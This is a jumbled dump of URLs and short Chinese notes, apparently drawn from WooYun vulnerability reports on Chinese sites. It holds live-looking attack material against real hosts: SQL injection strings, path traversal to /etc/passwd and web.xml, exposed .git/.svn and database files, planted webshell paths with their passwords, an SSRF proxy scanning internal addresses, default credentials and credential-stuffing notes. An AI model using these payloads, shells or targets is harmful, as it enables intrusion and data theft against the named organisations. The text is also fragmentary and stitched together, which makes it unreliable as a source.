http://www.qioa.cn/product/xsd.html http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1 http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://**.**.**//client/checkuser.aspxuser=1%27&pwd=1_ http://**.**.**//client/checkuser.aspxuser=%27&pwd=1_ http://**.**.**//client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://**.**.**/client/checkuser.aspxuser=%27and%20@@version%3E0--&pwd=1_ http://c.ebaoyang.cn http://www.youxinpai.com/app/buyer/ http://newmobile3.youxinpai.com/ChannelData/GetBannerList.ashx http://124.115.26.74:8081/.git/config http://bbs.lidroid.com:8085/.git/config http://apps.lidroid.com/.git/config http://blog.lidroid.com/.git/config http://i.lidroid.com/.git/config http://static.lidroid.com/.git/config http://**.**.**.**/News/Default.aspx?Kind=c00001 http://**.**.**.**/hk/industrymore.aspx?q=Block https://github.com/kongzhidea/kongzhidea/blob/7286f9c1a7b65bc85bd113223016d2fb1ee0f5f8/xoa/xoa-common/xoa-client-registry/src/main/java/com/xoa/client/util/SendMailUtil.java https://github.com/kongzhidea/kongzhidea/blob/7286f9c1a7b65bc85bd113223016d2fb1ee0f5f8/xoa/xoa-common/xoa-client-registry/src/main/java/com/xoa/client/util/SendMailUtil.java http://ebaoyang.cn/front/index/show?model=130367&ss=1050001 http://**.**.**.**:8081/RuvarHRM/ http://**.**.**.**:8080/RuvarHRM/ http://**.**.**.**/ http://www.adyun.com/zhaopin/jobdetail?rid=98 index.php/house/ajax_set_score/?s=0.10654069157317281 http://yy.loupan.com/ B773EEC577A0B64DB44371A12DDA3B1D:FG=1 http://**.**.**.**/bugs/wooyun-2015-098853 http://**.**.**.**/index.asp http://rus.ecnu.edu.cn:80/ http://**.**.**.**/system/Advise/View.aspx?id=15 http://**.**.**.**/MainPage.aspx http://**.**.**.**/system/Advise/View.aspx?id=15 http://**.**.**.**/bugs/wooyun-2015-0129923 inurl:/themes/mskin/login/ inurl://mskin/login/ http://119.254.70.128 http://119.254.70.146/logs/ http://119.254.70.153/logs/ http://**.**.**.**/news.php?sn=750 http://**.**.**.**/BG/nzcms_list_news.asp?id=724&sort_id=664 http://www.tintinloan.com/newCaculate.jsp http://**.**.**.**/bugs/wooyun-2015-0149860/trace/396c9e18412ae4bb2d3013b244d7435e http://123.150.185.221:8080/index.php http://**.**.**.** http://**.**.**.**/2013ruijin/ruijin/ http://**.**.**.**/OA.Portal.Website/Pages/Default.aspx http://**.**.**.**/2013ruijin/ruijin/jssq/jxsqcs/index.shtml http://nwgzportal.health.ikang.com/loginui https://github.com/doublesw/kuwoJumpServer http://**.**.**.**:8000/GetHotelListAction!initImport.do http://**.**.**.**/ http://**.**.**.**/tools/download.php?src=../../index.php http://**.**.**.**/Backstage/functions/login.php index.php/house/ajax_set_support/?s=0.27279418450780213 http://xm.loupan.com/ BBE986E212513ABDE98CD4B4C7553968:FG=1 http://hezuo.xcar.com.cn/iphone/kc/bbsGetPostsByForumId.php?type=2&limit=20&offset=0&forumId=874 https://mail.jinjianghotels.com/ http://intranet.jinjianghotels.com/ http://srm.jinjianghotels.com/jjsrm/Portal/StartPage.aspx http://124.117.242.168/ http://xnypx.600795.com.cn:81 http://**.**.**.**/bmxx_view.php?id=4188 http://**.**.**.**/Cjsfw_info.php?id=13331 http://**.**.**.**/vod_view.php?id=287 http://**.**.**.**/web_content.php?id=13646 http://**.**.**.**/list3.php?maxcid=7&cid=29 http://**.**.**.**/xzzx.php?infoclass=13 http://**.**.**.**/article_list.php?S_id=25 http://**.**.**.**/admin/menu.php http://**.**.**.**/data/ http://**.**.**.**/upload/ http://**.**.**.**/aspnet_client/ http://**.**.**.**/upload/20130922152854772.php http://**.**.**.**/upload/20130922153411298.php http://**.**.**.**/upload/20130922153719975.php http://**.**.**.**/upload/images/help.php http://**.**.**.**/upload/ylcfxkjj.txt http://**.**.**.**/rendawork/Index.do http://**.**.**.**/login/Login.jsp?logintype=1 https://**.**.**.**/node/stock-market/plaza/sell http://**.**.**.**/bugs/wooyun-2010-0139659这里看到主站一处注入的account表再次躺枪 https://**.**.**.**/node/stock-market/plaza/sell?ent_name=123 http://www.dzqh.com.cn http://www.dzqh.com.cn/UploadFileDir/content_file/20150408203503006962970.jsp http://manage.juhai.youku.com/audit/auditCommentList?auditStatus=2 http://m.jrj.com.cn/sso/mobileLogin http://**.**.**.**/ http://vipdrvier.vvipone.com http://ws.ebaoyang.cn http://z.ebaoyang.cn http://admin.ebaoyang.cn http://j.ebaoyang.cn http://w.ebaoyang.cn http://c.ebaoyang.cn http://c2.ebaoyang.cn http://**.**.**.**/ http://**.**.**.**/phpMyAdmin/index.php http://**.**.**.**/phpinfo.php获取到的) http://**.**.**.**/upload.php?Type= http://**.**.**.**/updatesn.php http://**.**.**.**/showurl.asp?id=32555 http://**.**.**.** https://218.78.217.82/fail http://218.78.217.82:8000/cardmanage/ http://workflow.cyou-inc.com//messager/users.data http://**.**.**.**/ http://**.**.**.**/User/ http://**.**.**.**/Inc/ http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-0148202这个ip是甘肃省安全考试系统。 http://**.**.**.**/bugs/wooyun-2014-065195某公司开发的e-Learning系统存在通用SQL注入漏洞。涉及的比较广:银行、邮政、证券、学校、企业、事业单位等。 http://**.**.**.**) http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/index.do http://**.**.**.**:808/eln3_asp/public/gzjcjt/resource_list.jsp http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/public/cscec8b/login_cscec8b.jsp http://**.**.**.**:8080/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/ http://**.**.**.**/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml http://**.**.**.**/eln3_asp/ http://**.**.**.**/eln3_asp/ http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://mall.laolaibao.com/data/,http://mall.laolaibao.com/includes/,存在目录遍历,可泄露数据库配置信息、ecs用户信息和其它源码信息。另外某处可上传任意文件,但未找到上传路径。 user:admin password:admin http://www.feeyo.com/ https://github.com/superman66/ChiQiFound/blob/0f45e27f1309e66841795835765ade0094aba5ed/src/core/app/jdbc_dev.properties http://b.daojia.com.cn/.svn/entries http://**.**.**.**/portal/fsxz/ http://**.**.**.**/canting/map/gongjiao/?s=mlyhdjgcd1889&ea= http://**.**.**.**/canting/map/gongjiao/?s=jwxsxlmg6741&ea= http://**.**.**.**/canting/map/zijia/?s=qbfssd4286&ea= http://**.**.**.**/canting/map/gongjiao/?s=JNCZHACD823&ea= http://wx.laolaibao.com/page_jp.aspx?pdate=2015-08-14 http://www.sftm.com.cn/news.asp?ClassID=0204&absolutepage=12&select=2008 http://**.**.**.** http://61.149.46.14:8080/ http://61.149.46.14:8080/is/index.jsp http://**.**.**.**//public/upload/file.jsp http://**.**.**.**/public/upload/file.jsp http://**.**.**.**/public/upload/file.jsp http://**.**.**.**//public/upload/file.jsp http://**.**.**.**/page/w/2/w/w01702v6d2w.html http://up.tootoo.cn/upload.jsp http://**.**.**.**/SGTD04reg/Candidate/C_SignIn.aspx http://**.**.**.**/SGTD17reg/Candidate/C_SignIn.aspx?code=141021 http://**.**.**.**/SGTD11reg/Candidate/C_SignIn.aspx?code=150808 http://**.**.**.**/SGTD39reg/Candidate/C_SignIn.aspx?code=141128 http://**.**.**.**/SGTD60reg/Candidate/C_SignIn.aspx?code=150121 http://**.**.**.**/SGTD42reg/Candidate/C_SignIn.aspx?code=141206 http://**.**.**.**/SGTD45reg/Candidate/C_SignIn.aspx?code=20141207 http://**.**.**.**:7942/SGZJ42reg/Group/G_SignIn.aspx http://**.**.**.**:7942/SGTD52reg/Candidate/C_SignIn.aspx http://**.**.**.**/SGTD73reg/Candidate/C_SignIn.aspx http://assess.yaochufa.com/admini/public/login http://localhost:7002&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search jdbc:oracle:thin:@**.**.**.**:1521:FMETRO https://**.**.**.**/laolang81/food/blob/2312771af5555d6b9c81c17fb1564be024adbe76/config/properties/mail.properties http://**.**.**.**/edoas2/oa.jsp http://**.**.**.**/hbxx/hbxx.aspx?hkgs=MF http://mi.xcar.com.cn/interface/gcpapp/desireApply.php http://**.**.**.**/zhuanti/zhuanchang/index.php?zid=3981359526867737"--dbs http://www.wooyun.org/bugs/wooyun-2015-0150214 http://www.wooyun.org/bugs/wooyun-2015-0150213 http://mail.91tianmi.com http://182.92.235.112:8080/tm_calc/cms/resource/about/list/1 http://**.**.**/tm_web_admin http://**.**.**/tm_master/_ http://git.91tianmi.com:8083 http://182.92.235.112:8080/tm_calc/login https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(微信的用户值)&skey=(微信的用户值) https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 www.faw-foundry.com.cn http://wlds.hit.edu.cn/WindLab/zxgj.jsp?id=6 http://wap.jjwxc.net/book2/541143/1 http://61.184.32.10:8888/login.jsp;jsessionid=e5ff37ef8605b5a85403746e6584058d http://www.midifan.com/modulehardware-goods.htm?sid=1 http://www.zzidc.com/main/virtualhost/addshopping.action, http://www.haodai.com/ajax/getpasswd http://doctor.club.xywy.com/new/index.php?type=message http://182.254.138.136/ http://www.gxtmall.cn/ http://www.vatti.com.cn/getlist2.php?city=t&id=&cateid=159 http://www.vatti.com.cn/getlist.php?city=t&id=&cateid=159 http://**.**.**.**/bugs/wooyun-2015-0140090 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=30005 https://github.com/523039704/aa/blob/abd8a4930ea80c53098b570c876efc70a7f271aa/bbs.issgame.com/config/config.properties jdbc:mysql://114.112.58.158:3306/fgpbilling?useUnicode=true&characterEncoding=utf8 http://**.**.**.**/news/html/?505.html http://i.swufe.edu.cn/net/page/empty_more.php?i=b%25 http://**.**.**.**/news_x.aspx?id=41 http://afis.hit.edu.cn//examples/servlets/servlet/SessionExample http://ee403.hit.edu.cn/asp/view.asp?id=454 http://iedc.hit.edu.cn/newsshowDetail.asp?id=169 http://oia.hit.edu.cn/zhaopin.asp?ClassID=29 http://imccc2012.hit.edu.cn/imccc2012.sql http://ee403.hit.edu.cn/database.rar http://ices.hit.edu.cn/admin/ewebeditor/db/ewebeditor.mdb android:exported="true android:name="**.**.**.**work.DownloadService android:process="**.**.**.**work.DownloadService android:priority="1000 android:name="**.**.**.**work.DownloadService"/ http://**.**.**/scweb/show.jspid=227&type=0&child_type=25_ http://**.**.**/findItemForDep.SmbsServletpageFlag=spzn&depID=0036_ http://**.**.**/findItemForDep.SmbsServletpageFlag=spzn&depID=903_ http://**.**.**/scweb/zwdt/depIntrl.jspdepid=_ http://**.**.**/web/zwdt/depIntrl.jspdepid=_ http://**.**.**/web/zwdt/bgxz_bg.jspid=102_ http://**.**.**/scweb/zwdt/bgxz_bg.jspid=0001_ http://**.**.**/web/zwdt/bszn.jsppageFlag=spzn&itemid=101001001&depid=101001_ http://**.**.**/web/zwdt/bszn.jsppageFlag=spzn&itemid=01001&depid=903_ http://**.**.**/scweb/zwdt/bszn.jsppageFlag=spzn&itemid=0001001&depid=0001_ http://**.**.**/web/zxxx/web.webservletaction=zxxxsearch&type=0&child_type=25&child_name=%D6%D0%D0%C4%D0%C2%CE%C5_ http://**.**.**/web.webservletaction=getnews&type=24&child_type=0 http://**.**.**/scweb/zxxx/scweb.scwebservletaction=zxxxsearch&type=0&child_type=25&child_name=%D6%D0%D0%C4%D0%C2%CE%C5_ http://**.**.**/web/zwdt/findwebqa.qaaction=findwebqa_ http://**.**.**/web/zwdt/findwebqa.qaaction=findwebqa_ http://**.**.**/scweb/web/zwdt/findwebqa.qaaction=findwebqa https://182.92.148.48/ redis_version:2.8.8 redis_git_sha1:00000000 redis_build_id:7baf01e2b5c7573a redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.6.3 process_id:806 run_id:f608fb73456812994ce883fb0d10c53e818ad837 tcp_port:6379 uptime_in_seconds:12543625 uptime_in_days:145 lru_clock:3248032 config_file:/etc/redis/6379.conf used_memory:6621488 used_memory_human:6.31M used_memory_rss:8585216 used_memory_peak:8446568 used_memory_peak_human:8.06M used_memory_lua:33792 mem_fragmentation_ratio:1.30 mem_allocator:libc rdb_last_save_time:1446088362 total_connections_received:618701950 total_commands_processed:1002116377 expired_keys:136358 keyspace_hits:936326347 keyspace_misses:481203 latest_fork_usec:246 role:master repl_backlog_size:1048576 used_cpu_sys:268089.44 used_cpu_user:40124.07 used_cpu_sys_children:103.17 used_cpu_user_children:439.12 db0:keys=100,expires=66,avg_ttl=7611829427 http://**.**.**.**/bugs/wooyun-2015-0141038 http://**.**.**.**:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://**.**.**.**:8078/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://**.**.**.**:4455/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://**.**.**.**/zfoa//gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://eas75.kingdee.com:85/ http://zygx.nwpu.edu.cn/2015/renliziyuanguanli/HRM/lyb/reply.asp?l_id=13 http://www.nfu.edu.cn/ http://www.nfsysu.cn/ http://www.skyworthlcd.com/en/Product.aspx?s=a http://app.wanda.cn/wanda3v/user/userinfo.html?userid=wangyang http://**.**.**.**/news_x.aspx?id=76 http://wap.damai.cn/login.aspx,此处无限制,可撞库,从14万库中可撞得2788个有效账号,登陆后可查看订单信息和收货地址,可泄露大量用户信息。 http://activity.yaochufa.com/lottery/getresult/joinprize?id=207 http://**.**.**.**:88/ http://**.**.**.**:88/message/send/601from_url=http%3A%2F%2F**.**.**.**%3A88%2Fmessage%2Fdetails%2F601 http://**.**.**.**/test@.txt http://oa.daojia.58.com https://github.com/sdugb/RenderCommunity/blob/33a6c27da8e33ee70b5761f11c76319b2e5ed54a/config.js http://mail.nwpu.edu.cn/ http://222.24.192.85/ http://www.blogbus.com/brigham-logs/336886977.html http://t.178.com/user/login?to=http%3A%2F%2Ft.178.com%2Fresource%2Fshow%3Ftoken32%3D22cb5f2a1e5568b686437f73f5dcef24登录你的二次元身份设计缺陷可撞库用户,用户名密码均明文传输的: http://121.34.249.235/总部IT系统产品管理网站 http://www.comicup.cn/benzi/nccuser.aspx?c=1 http://www.comicup.cn/benzi/ajax/NCCUser/getUserInfo.ashx http://media.moa.zte.com.cn/mpp/MsgView.action encap:Ethernet addr:10.30.7.188 Bcast:10.30.255.255 Mask:255.255.0.0 fe95:691a/64 Scope:Link MTU:1500 packets:1014612456 packets:69261279 txqueuelen:1000 http://www.eb80.com.cn/retrieve.aspx http://www.eb80.com.cn/login.aspx www.eb80.com.cn http://www.eb80.com.cn http://passport.8684.com/8684/login_b_v2.php?ref=http%253A%252F%252Fpassport.8684.com%252F8684%252Fgetpwd.php&&f5=0&v=1446109308563这处登录的接口,抓包发现用户名密码都是明文的,然后也没发现验证码 http://**.**.**.**/ http://**.**.**.**/newsview.asp?News_ID=9 http://**.**.**.**:8081/)存在Sql注入漏洞 https://manhattan.liwushuo.com/admin/ldap/login http://**.**.**.**/ http://**.**.**.**/ http://demo.weiphp.cn/index.php?s=/Home/Public/step_2/id/138.html http://demo.weiphp.cn/index.php?s=/Home/Public/step_2/id/*.html http://i.huanqiu.com/login这个地方一开始是没有验证码的,然后输入错误达到一定次数就出来了验证码: http://**.**.**.**/faces/pages/ticketMain.xhtml https://**.**.**.**/search?newwindow=1&hl=zh-CN&site=imghp&tbm=isch&sa=1&q=新世界影城+会员卡&oq=新世界影城+会员卡 http://**.**.**.**/ci/20120701/10420009.180226.944.jpg site:newcapec.net,百度一下你就知道,google一下你知道的太多了 http://cos.sto.cn http://cos.sto.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=a https://**.**.**.** https://**.**.**.**/member/memberRegistryAction!validateUserName.action https://**.**.**.**/member/memberRegistryAction!validateUserName.action链接,即可重置该用户手机号 http://**.**.**.**/index.php http://**.**.**.**/ https://**.**.**.**/dennisnunezph/cgg-dockerfiles/blob/06329218b21a40349453192f065914d1c3c68db7/libris/.env http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://blog.sohu.com/resin-admin/index.php http://ruanwen.lusongsong.com/anli/anliinfo.php?ID=88) http://ruanwen.lusongsong.com/upload/headpic/style.php http://lusongsong.com/zb_system/login.asp http://**.**.**.**/InfoMsg/ http://**.**.**.**/ImageWeb/2013/%E5%B9%B4%E6%A3%80/ http://localhost:7002&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/xylogin.asp http://**.**.**.**/bugs/wooyun-2010-0148921 http://**.**.**.**/messager/users.data http://www.gohealth.ecnu.edu.cn/ http://www.yjsjl.ecnu.edu.cn/ http://www.yjsjl.ecnu.edu.cn/news/manage/login/login.asp http://202.104.30.113:8000/ http://202.104.30.113:8000/console/login/LoginForm.jsp http://202.104.30.113:8000/ma/ma3.jsp http://cpadmin.ule.com/cpadmin/login.do https://**.**.**.** http://210.21.236.163 http://mi.xcar.com.cn/interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000&deviceType=0&rollNumbers=-1 http://user.qbcdn.com/user/avatar/queryAvata65/25004061/nosrc/1000 http://**.**.**.**:7001/console/ http://**.**.**.**/showthread.php?t=156643 http://**.**.**.**/dis9_tysan http://**.**.**.**/WebUI/Login.aspx?ReturnUrl=%2fWebUI%2fPortal.ashx http://star.ctsho.com/platform/logout.action http://**.**.**.**/agent-self/logout.action存在命令执行漏洞 http://game.sports.sina.com.cn http://yangtai.xunlei.com/ http://**.**.**.**/InfoQueryService/AlarmService/SaveGuardVehAlarm soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/InfoQueryService/AlarmService soap:Body soap:Envelope http://ke2u.com/ http://**.**.**.**/ http://125.210.135.167:133/manage/login.action http://**.**.**.**/shop/member!logout.action存在命令执行漏洞 http://**.**.**.**/test.jsp密码tom http://www.liwushuo.com/app http://**.**.**.**/chinatelcom/speedtest/sccs/index.shtml http://mainone.cn/ http://main one.cn/CompanyTemplate/Default/CompanyNewsList.aspx?CompanyID=400428740-- http://mainone.cn/Supply/SupplyList.aspx?ChangeType=0 http://mainone.cn/Admin/login.aspx http://m.100tal.com:80/ http://**.**.**.**/bbs/bbsAction!replyList.action?topic.id=182&bbsType=2存在上传漏洞,打开这个网页,添加附件 http://**.**.**.**/attached/bbs/2015103009323256985849.jsp密码tom http://**.**.**.**/attached/bbs/2015103009224839638271.jsp密码123 http://**.**.**.**/position/show.php?id=2734 http://m.t.ikang.com/#/enter/Order/myOrderDetail/1446135404032555 http://m.t.ikang.com http://**.**.**.**/ http://**.**.**.**/phpmyadmin http://43.242.50.237:9200/ http://43.242.50.236:9200/ http://**.**.**.**/ireadbass/login.htm http://fcs.9cair.com http://fcs.9cair.com/ImageShowServlet?para=fcs123&filetype=1&filePath=../../../../../../../../../etc/passwd%00 https://**.**.**.**/ http://i.ziroom.com/ http://shanghai.daojia.com.cn/combo_list.php?p=1&a=75 http://beijing.daojia.com.cn/food_search.php?a=1&r=12401&name= http://school.suning.com/ http://smile.wanda.cn/app/oauth/advice?count=0&page=0&t=1446172201.354999&uid=§66609§ http://image.wanda.cn/smile/upload/mobile/2014/05/23/20140523112010_150.jpg http://fanyi.baidu.com/transpage?query=https%3A%2F%2Ftest-bingd0ng.c9.io%2FFY.php&source=url&ie=utf8&from=auto&to=zh&render=1 http://**.**.**.**:9098/feedback/feedbackLogin.do?method=logon http://zhuanlan.daojia.com.cn/wp-login.php http://www.chdyh.com.cn/yhmd/vvise.do?method=secondaryMenu&cid=03.03 http://221.8.57.98:7005/EbsWeb/getMyInsurance.do?UIAction=checkContent&consultationID=220000000000000054 http://tang.damai.cn/ask/ http://115.236.185.239/dashboard/ http://115.236.185.253/index.php?q=index&goto=feedback/list&ac=noreply http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/uploads/%E9%99%84%E4%BB%B6%EF%BC%9A%E8%BF%8E%E6%96%B0%E7%B3%BB%E7%BB%9F%E4%BD%BF%E7%94%A8%E8%AF%B4%E6%98%8E%E6%96%B0.doc http://60.28.195.106:8100/.svn/entries http://60.28.198.35/log/ http://**.**.**.** http://61.50.187.141/login!login1.action http://61.50.187.141/one8.jsp http://61.50.187.141/cmd.jsp http://61.50.187.141/nei.jsp?http://10.101.240.11:80 http://61.50.187.141/nei.jsp?http://10.101.240.16:80 http://61.50.187.141/nei.jsp?http://10.101.240.21:80 http://61.50.187.141/nei.jsp?http://10.101.240.22:80 http://61.50.187.141/nei.jsp?http://10.101.240.25:80 http://61.50.187.141/nei.jsp?http://10.101.240.30:80 http://61.50.187.141/nei.jsp?http://10.101.240.33:80 http://61.50.187.141/nei.jsp?http://10.101.240.35:80 http://61.50.187.141/nei.jsp?http://10.101.240.36:80 http://61.50.187.141/nei.jsp?http://10.101.240.37:80 http://61.50.187.141/nei.jsp?http://10.101.240.39:80 http://61.50.187.141/nei.jsp?http://10.101.240.40:80 http://61.50.187.141/nei.jsp?http://10.101.240.50:80 http://61.50.187.141/nei.jsp?http://10.101.240.51:80 http://61.50.187.141/nei.jsp?http://10.101.240.55:80 http://61.50.187.141/nei.jsp?http://10.101.240.71:80 http://61.50.187.141/nei.jsp?http://10.101.240.80:80 http://61.50.187.141/nei.jsp?http://10.101.240.87:80 http://61.50.187.141/nei.jsp?http://10.101.240.90:80 http://61.50.187.141/nei.jsp?http://10.101.240.96:80 http://61.50.187.141/nei.jsp?http://10.101.240.103:80 http://61.50.187.141/nei.jsp?http://10.101.240.104:80 http://61.50.187.141/nei.jsp?http://10.101.240.113:80 http://61.50.187.141/nei.jsp?http://10.101.240.114:80 http://61.50.187.141/nei.jsp?http://10.101.240.120:80 http://61.50.187.141/nei.jsp?http://10.101.240.121:80 http://61.50.187.141/nei.jsp?http://10.101.240.122:80 http://61.50.187.141/nei.jsp?http://10.101.240.138:80 https://**.**.**.**/wkServer/wkServer/blob/e0eb8b673428b223603f325107abc9e8af567cc5/config/db.properties jdbc:mysql**.**.**.**:3306/wo_sales?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132 http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132 http://standard.kjpt.91huayi.com/frame/index.aspx http://os.wasu.cn/mp/mp.php?id=330 http://open.ikamobile.cn:8391/ordermanage?uid=19&partner_id=002 http://www.homelinkhr.com/view_initIndexPageForCustomer.action http://**.**.**.** http://qu.8684.com这个网站的登录位置没有验证码: http://m.ahic.com.cn/wxpt/claimsSeachAction.do http://221.8.57.98:7005/EbsWeb/ge http://ff.zqgame.com/ff.zqgame.com.tar.gz http://k.ganji.com/password?returnUrl=%2Fuc www.fengniao.com http://www.aimer.com.cn/account/address?page=myaddress http://**.**.**.**/Member/MemberLogin.aspx http://**.**.**.**//Login.aspx http://sso.dwb.so/changepassword_check.php验证码,输入任意6位验证码即可成功,导致任意手机号登陆,更奇怪的是不发送验证码也能改密码。。。 http://v.dwb.so/buy.php)vip存在支付漏洞; http://sso.dwb.so/changepassword_check.php http://**.**.**.**/GetC_InfoSharedModules soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Header http://**.**.**.**/ http://**.**.**.**/GovernmentDetail.aspx?tuId=286&NRID=123 http://**.**.**.**/NewsCenter/NewsDetail.aspx?id=99897 http://**.**.**.**/radnew.aspx?id=123&pid=201102150834270468 http://**.**.**.**/ZWGK/Content.aspx?uid=123&cid=64&id=2063 http://**.**.**.**/Info_zx/info_par.aspx?id=123746 http://**.**.**.**/Info_zx/info_par.aspx?id=123303 http://**.**.**.**/imageshow/Imageshow.aspx?bigcataid=0-1-20-5&id=123702 http://**.**.**.**/news_bak.aspx?id=123 http://**.**.**.**/websites/Pages/Web/NewsDetails.aspx?id=25a88d66-c4b3-4f50-ac6e-71123e3a646b http://**.**.**.**/NewsView.aspx?ID=12314&MID=460 http://**.**.**.**/Client/NewInfo.aspx?Id=123&deptId=23 http://**.**.**.**/gov_affair/orb_jbxx.aspx?orb_id=123 http://**.**.**.**/zwgk/Show.aspx?id=39123 http://**.**.**.**/NewsDetail.aspx?id=123 http://**.**.**.**/Info_zx/info_par.aspx?id=123746 http://**.**.**.**/infoshow.aspx?id=2494&ws=002002 http://**.**.**.**/Print.aspx?id=123849 http://**.**.**.**/Infomation/showinfo.aspx?ID=12324 http://**.**.**.**/cyfc/newshow.aspx?id=123 http://**.**.**.**/UpFile/template/contentpage/zgwj_Xwzxnew/item.aspx?tc=1&id=123919&p=0 http://**.**.**.**/clbweb2005/China/jiangsu/suzhougs/NewsShow.aspx?consume=1&InfoID=123 